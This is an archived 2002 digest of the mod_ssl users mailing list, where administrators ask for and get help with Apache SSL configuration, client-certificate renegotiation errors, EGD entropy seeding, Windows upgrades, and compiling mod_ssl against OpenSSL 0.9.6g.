Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 03:14:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA20559; Fri, 15 Nov 2002 03:13:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from goldfisch.at id DAA20548; Fri, 15 Nov 2002 03:12:11 +0100 (MET)
From: pilsl@goldfisch.at
Received: from goldfisch.at (localhost.localdomain [127.0.0.1])
	by goldfisch.at (8.12.1/8.12.1) with ESMTP id gAF2EPg1019137
	for ; Fri, 15 Nov 2002 03:14:25 +0100
Received: (from pilsl@localhost)
	by goldfisch.at (8.12.1/8.12.1/Submit) id gAF2EPUg019134
	for modssl-users@modssl.org; Fri, 15 Nov 2002 03:14:25 +0100
Date: Fri, 15 Nov 2002 03:14:25 +0100
To: modssl-users@modssl.org
Subject: Re-negotiation problems with *all* clients
Message-ID: <20021115031425.A18374@goldfisch.at>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.23i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pilsl@goldfisch.at
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm running apache and mod_ssl for a long time now.  Now I wanted to
add support for client-auth and got in big troubles at the beginning.

As soon as any client wants to connect to a folder that (I tested
netscape7, opera6, konqueror and lynx2.8) the client gets an
unspecified error (or crashes like opera6) and the server (apache2) has the
following in its logs:

[Fri Nov 15 03:05:06 2002] [error] Re-negotiation handshake failed: Not accepted by client!?
[Fri Nov 15 03:05:06 2002] [error] SSL handshake failed (server c2.goldfisch.at:443, client 62.99.146.117)
[Fri Nov 15 03:05:06 2002] [error] SSL Library Error: 336105671 error:140890C7:lib(20):func(137):reason(199)

The config is very simple:

SSLPassPhraseDialog  builtin
SSLSessionCache        none
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
 
SSLCertificateFile /data/ssl/peter/www.goldfisch.at.crt
SSLCertificateKeyFile /data/ssl/peter/www.goldfisch.at.key


  SSLCACertificateFile /data/ssl/peter/ca.crt
  SSLVerifyClient require
  SSLVerifyDepth 1



I didnt install any client-certs by now (cause I still dont know how
to do this : I was hoped to get asked for it by the client when
connecting)


Now I fear that my ca.crt has wrong format.  This is my own selfsigned
CertificateAuthority that I used to sign www.goldfisch.at.crt too.

I also tried to create a new client-cert and put the crt-part there
instead with the same result.

By now I dont know if a client-cert is the crt-part that is signed by
my CA and the ca-crt must be put to the SSLCACertificateFile-directive
or if I should just create a new certificate (signed by my CA) and the
crt-part should be put in the SLCACertificateFile-directive and the
keyfile is the part that I need to install somehow at my client.

I really searched the mod_ssl-docs but I couldnt find the answer.

For the Re-negotiation-problem I found frequent entries dealing with
the same problem, but all seems to be related to problems with
MSIE-browsers that have a ssl-keep-alive bug or something. My problem
seems to be different, cause I dont use MSIE at all and the problem
occures with all clients I tried.

thnx,
peter


-- 
mag. peter pilsl
IT-Consulting
tel: +43-699-1-3574035
fax: +43-699-4-3574035
pilsl@goldfisch.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 08:42:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA27980; Fri, 15 Nov 2002 08:41:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA27970; Fri, 15 Nov 2002 08:40:11 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id ED9124CE94A; Fri, 15 Nov 2002 08:40:10 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F2012286D6; Fri, 15 Nov 2002 08:12:36 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.chi1.ameritech.net id DAA20808; Fri, 15 Nov 2002 03:24:54 +0100 (MET)
Received: from a7v ([64.109.31.57]) by mailhost.chi1.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with ESMTP
          id <20021115022453.LNJH29240.mailhost.chi1.ameritech.net@a7v>
          for ; Thu, 14 Nov 2002 20:24:53 -0600
Content-Type: text/plain;
  charset="us-ascii"
From: raymond 
To: modssl-users@modssl.org
Subject: Bugfix for compiling mod_ssl-2.4.10-1.3.9 against openssl-0.9.6g.
Date: Fri, 15 Nov 2002 02:28:59 +0000
User-Agent: KMail/1.4.2
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200211150228.59329.rferguson@voyager.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: raymond 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I had trouble thismorning compiling mod_ssl-2.4.10-1.3.9 against 
openssl-0.9.6g.  The problem was well documented in the following two posts 
on your archives.  

http://www.mail-archive.com/modssl-users@modssl.org/msg15050.html
http://www.mail-archive.com/modssl-users@modssl.org/msg09673.html

I didn't find the answer there, but I did find the answer in the latest rev's 
source code and wanted to share it somewhere publically accessable.

Here is a snip of compiler barf for google to index:

-DSSL_COMPAT -I/export/developers/rmb/open_ssl/src/openssl-0.9.6/include 
-DMOD_SSL_VERSION=\"2.4.10\" ssl_util_ssl.c && mv ssl_util_ssl.o 
ssl_util_ssl.lo
ssl_util_ssl.c:145: conflicting types for `d2i_PrivateKey_bio'
/export/developers/rmb/open_ssl/src/openssl-0.9.6/include/openssl/x509.h:779: 
previous declaration of `d2i_PrivateKey_bio'

This fix lies in modifying pkg.modssl/ssl_util_ssl.c like so:

/* OLD BROKEN CODE
**static EVP_PKEY *d2i_PrivateKey_bio(BIO *bio, EVP_PKEY *key)
**{
**     return ((EVP_PKEY *)ASN1_d2i_bio(
**             (char *(*)())EVP_PKEY_new,
**             (char *(*)())d2i_PrivateKey,
**             (bio), (unsigned char **)(key)));
**}
*/
/*NEW CHEERY BRIGHT CODE*/
#if SSL_LIBRARY_VERSION <= 0x00904100
static EVP_PKEY *d2i_PrivateKey_bio(BIO *bio, EVP_PKEY **key)
{
     return ((EVP_PKEY *)ASN1_d2i_bio(
             (char *(*)())EVP_PKEY_new,
             (char *(*)())d2i_PrivateKey,
             (bio), (unsigned char **)(key)));
}
#endif

Cheers,

-Ray Ferguson.
-- 
ONLY the STRONG SURVIVE...all those DOWNWIND PASSOUT !!!!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 09:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA00490; Fri, 15 Nov 2002 09:26:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA00470; Fri, 15 Nov 2002 09:25:06 +0100 (MET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP
	id 4C7303332; Fri, 15 Nov 2002 09:25:04 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id B58953330; Fri, 15 Nov 2002 09:25:01 +0100 (MET)
Date: Fri, 15 Nov 2002 09:25:01 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Cc: apache-ssl@lists.aldigital.co.uk, openssl-users@openssl.org
Subject: Re: Apache + mod_ssl (OpenSSL Error)
Message-ID: <20021115082501.GA8385@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org,
	apache-ssl@lists.aldigital.co.uk, openssl-users@openssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Nov 14, 2002 at 10:52:00PM +0000, Manoj Kithany wrote:
> 
> Hi Experts!
> 
> I want to INSTALL and CONFIGURE my APACHE 1.3.27 for SSL. I am using IBM 
> AIX box.
> So, I got mod_ssl from the IBM site and installed it in following way(after 
> READing INSTALL file for 2 hrs;-(
> 
> ------------------------------------------------------------------------
> #pwd
> /opt/freeware/src/packages/SOURCES/mod_ssl-2.8.11-1.3.27

> So, I finally READ the LOG file "error_log" and checked it shows:
> ------------------------------------------------------------------------
> [error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key 
> (OpenSSL library error follows)
> [error] OpenSSL: error:24064064:random number 
> generator:SSLEAY_RAND_BYTES:PRNG not seeded
> [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib
> ------------------------------------------------------------------------
> 
> Do you know what this error would be? I have already installed EGD entrophy 
> and is it stored in /dev/egd-pool
> Any links/pointers on this is appreciated.

/dev/egd-pool is only queried automatically starting with OpenSSL 0.9.7.
For 0.9.6x you have to enter the appropriate path using the SSLRandomSeed
directive in httpd.conf. Details are found in the manual.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 12:22:47 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA09666; Fri, 15 Nov 2002 12:21:53 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ganesh.ctd.hctech.com id MAA09496; Fri, 15 Nov 2002 12:20:15 +0100 (MET)
Received: by GANESH with Internet Mail Service (5.5.2653.19)
	id ; Fri, 15 Nov 2002 16:55:25 +0530
Message-ID: 
From: "Muralidhar K (SSG) - CTD, Chennai." 
To: modssl-users@modssl.org
Subject: Problem with mod_ssl 2.8.11
Date: Fri, 15 Nov 2002 16:46:10 +0530
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Muralidhar K (SSG) - CTD, Chennai." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All,


I have the following problem with Apache 1.3.27, mod_ssl 2.8.11, open ssl
0.9.6g :-

ssl_engine_log:[09/Nov/2002 03:37:56 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:38:07 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:38:19 26447] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:38:28 26435] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:38:37 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:38:49 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:00 26504] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:11 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:20 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:30 26435] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:40 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:39:51 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:01 26447] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:10 26435] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:22 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:32 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:41 26447] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:40:51 26435] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:41:01 26451] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:41:12 26426] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:41:21 26447] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:41:33 26435] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:49:21 28526] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:49:31 28527] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:49:41 28532] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:49:51 28530] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:50:02 28526] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:50:12 28527] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:50:23 28531] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
ssl_engine_log:[09/Nov/2002 03:50:33 28532] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]

When i observed with netstat -a, the connections are in CLOSE_WAIT state.  I
observed that so many people posted similar problems on the net. 

Kindly let me know if any patch available with mod_ssl or any solution for
this.

Regards,
Murali


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 21:41:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28168; Fri, 15 Nov 2002 21:40:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA28157; Fri, 15 Nov 2002 21:39:59 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 15 Nov 2002 12:38:53 -0800
Received: from 204.115.33.49 by lw7fd.law7.hotmail.msn.com with HTTP;
	Fri, 15 Nov 2002 20:38:53 GMT
X-Originating-IP: [204.115.33.49]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Apache 1.3.27 mod_ssl 2.8.12 openssl 0.9.6g Upgrade
Date: Fri, 15 Nov 2002 20:38:53 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 15 Nov 2002 20:38:53.0678 (UTC) FILETIME=[031420E0:01C28CE7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

We plan on upgrading to Apache 1.3.27 mod_ssl 2.8.12 openssl 0.9.6g from 
Apache 1.3.26 mod_ssl 2.8.10 openssl 0.9.6d on Windows.

We are considering the following two options:

Option A:

Download the Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip file,
upzip it and copy over the files to the current installation directory, 
overwriting the old files with the new files (excluding the conf and 
certificate files, etc).

Option B:

Re-Install Apache 1.3.27 (preserve the config and certificate files during 
the installation) and then copy over the unzipped files from the above zip 
file to the installation directory.

Which of the above two options is recommended and which one is the best way 
to upgrade this server on windows.

Any advice would be greatly appreciated.

Thanks and Regards,

Bye,
-Jim.

_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8. 
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 22:13:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28919; Fri, 15 Nov 2002 22:12:35 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id WAA28911; Fri, 15 Nov 2002 22:11:55 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 15 Nov 2002 13:11:48 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Fri, 15 Nov 2002 21:11:48 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: SSLRandomFIle Error (Apache-mod_ssl) 
Date: Fri, 15 Nov 2002 21:11:48 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 15 Nov 2002 21:11:48.0965 (UTC) FILETIME=[9C710150:01C28CEB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi:

I think I have Apache + mod_ssl on my IBM AIX box.

My httpd.conf file contains:
-----------------------------------------------------------

   ServerAdmin manojkithany108@hotmail.com
   DocumentRoot /kit
   ServerName www.my.server.name
   ErrorLog logs/log1
   SSLRandomFile file /dev/egd-pool 1024
   SSLCertificateFile /usr/local/ssl/certs/cert.cer
   SSLCertificateKeyFile /usr/local/ssl/bin/private.key

-----------------------------------------------------------
When I RUN my Apache, I get following Error:
-----------------------------------------------------------
# ./apachectl startssl
Syntax error on line 980 of /kit/conf/httpd.conf:
Invalid command 'SSLRandomFile', perhaps mis-spelled or defined by a module 
not included in the server configuration
./apachectl startssl: httpd could not be started
-----------------------------------------------------------

Do you know what is the problem? I read the documentation regarding the 
above since my IBM AIX Box does NOT have /dev/random

THANKS!


_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 22:16:47 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA29096; Fri, 15 Nov 2002 22:15:56 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id WAA29017; Fri, 15 Nov 2002 22:14:57 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 15 Nov 2002 13:13:50 -0800
Received: from 204.115.33.49 by lw7fd.law7.hotmail.msn.com with HTTP;
	Fri, 15 Nov 2002 21:13:50 GMT
X-Originating-IP: [204.115.33.49]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.27 mod_ssl 2.8.12 openssl 0.9.6g Upgrade
Date: Fri, 15 Nov 2002 21:13:50 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 15 Nov 2002 21:13:50.0497 (UTC) FILETIME=[E4E15110:01C28CEB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Small Correction:

Read first line of Option B as:

Fresh install of Apache 1.3.27 using apache_1.3.27-win32-x86-no_src.msi
at the current Apache 1.3.26 installation location.

>From: "Jim Lee" 
>Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Apache 1.3.27 mod_ssl 2.8.12 openssl 0.9.6g Upgrade
>Date: Fri, 15 Nov 2002 20:38:53 +0000
>
>Hi,
>
>We plan on upgrading to Apache 1.3.27 mod_ssl 2.8.12 openssl 0.9.6g from 
>Apache 1.3.26 mod_ssl 2.8.10 openssl 0.9.6d on Windows.
>
>We are considering the following two options:
>
>Option A:
>
>Download the Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip file,
>upzip it and copy over the files to the current installation directory, 
>overwriting the old files with the new files (excluding the conf and 
>certificate files, etc).
>
>Option B:
>
>Re-Install Apache 1.3.27 (preserve the config and certificate files during 
>the installation) and then copy over the unzipped files from the above zip 
>file to the installation directory.
>
>Which of the above two options is recommended and which one is the best way 
>to upgrade this server on windows.
>
>Any advice would be greatly appreciated.
>
>Thanks and Regards,
>
>Bye,
>-Jim.
>
>_________________________________________________________________
>Tired of spam? Get advanced junk mail protection with MSN 8. 
>http://join.msn.com/?page=features/junkmail
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org


_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 22:19:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA29436; Fri, 15 Nov 2002 22:18:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id WAA29302; Fri, 15 Nov 2002 22:17:35 +0100 (MET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 8E7333332
	for ; Fri, 15 Nov 2002 22:17:34 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id E31643331; Fri, 15 Nov 2002 22:17:31 +0100 (MET)
Date: Fri, 15 Nov 2002 22:17:31 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: SSLRandomFIle Error (Apache-mod_ssl)
Message-ID: <20021115211731.GA23499@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Nov 15, 2002 at 09:11:48PM +0000, Manoj Kithany wrote:
> Hi:
> 
> I think I have Apache + mod_ssl on my IBM AIX box.
> 
> My httpd.conf file contains:
> -----------------------------------------------------------
> 
>   ServerAdmin manojkithany108@hotmail.com
>   DocumentRoot /kit
>   ServerName www.my.server.name
>   ErrorLog logs/log1
>   SSLRandomFile file /dev/egd-pool 1024
>   SSLCertificateFile /usr/local/ssl/certs/cert.cer
>   SSLCertificateKeyFile /usr/local/ssl/bin/private.key
> 
> -----------------------------------------------------------
> When I RUN my Apache, I get following Error:
> -----------------------------------------------------------
> # ./apachectl startssl
> Syntax error on line 980 of /kit/conf/httpd.conf:
> Invalid command 'SSLRandomFile', perhaps mis-spelled or defined by a module 
> not included in the server configuration
> ./apachectl startssl: httpd could not be started
> -----------------------------------------------------------
> 
> Do you know what is the problem? I read the documentation regarding the 
> above since my IBM AIX Box does NOT have /dev/random

But you didn't read carefully enough. If you are using an EGD style device,
you must explicitely tell:
SSLRandomSeed startup egd:/var/run/egd-pool
SSLRandomSeed connect egd:/var/run/egd-pool

(Your path of course is different...)

Best,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 22:55:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00388; Fri, 15 Nov 2002 22:54:52 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id WAA00350; Fri, 15 Nov 2002 22:53:01 +0100 (MET)
Received: (qmail 17670 invoked from network); 15 Nov 2002 21:53:08 -0000
Received: from unknown (HELO wheeler.net) ([66.92.190.153])
          (envelope-sender )
          by mail11.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 15 Nov 2002 21:53:08 -0000
Date: Fri, 15 Nov 2002 13:53:06 -0800
Mime-Version: 1.0 (Apple Message framework v548)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: DBM on Mac OS X
From: David Wheeler 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: <9F99AC58-F8E4-11D6-8199-0003931A964A@wheeler.net>
X-Mailer: Apple Mail (2.548)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Wheeler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All,

I've been using mod_ssl with Apache 1.3.x on Mac OS X for a while now, 
and it works great. I've had to use gdbm to get it to compile, but that 
was okay with me.

Now, however, I'm writing an article about this, and want to try to 
eliminate the gdbm dependency in the name of simplicity. I know it can 
be done, because Apple includes mod_ssl with their Apache. Furthermore, 
they tell me that libdm is in the Mac OS X system library, libSystem. 
But configure has never been able to find it. -lm and -dbm both fail.

So I tried --enable-rule=SSL_SDBM, and that got Apache/mod_ssl to 
compile nicely. Yay! But then, when I tried to connect to the SSL port, 
Apache segfaulted!

   [Fri Nov 15 12:29:03 2002] [notice] child pid 26629 exit signal 
Segmentation fault (11)

So I'm stuck and could use some help. Does anyone know how to a) get 
Apache's configure to find libdbm in libSystem and use it? Or b) have 
any idea why Apache/mod_ssl might be segfaulting when using SDBM?

TIA!

David

-- 
David Wheeler                                     AIM: dwTheory
david@wheeler.net                                 ICQ: 15726394
http://david.wheeler.net/                      Yahoo!: dew7e
                                                Jabber: Theory@jabber.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 23:04:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA00713; Fri, 15 Nov 2002 23:02:43 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id XAA00701; Fri, 15 Nov 2002 23:01:41 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 15 Nov 2002 14:01:34 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Fri, 15 Nov 2002 22:01:34 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: Re: SSLRandomFIle Error (Apache-mod_ssl)
Date: Fri, 15 Nov 2002 22:01:34 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 15 Nov 2002 22:01:34.0951 (UTC) FILETIME=[903A4F70:01C28CF2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Lutz:

Where to put SSLRandomSeed....? Becos I put it in Virtual Host as shown:

      ServerAdmin manojkithany108@hotmail.com
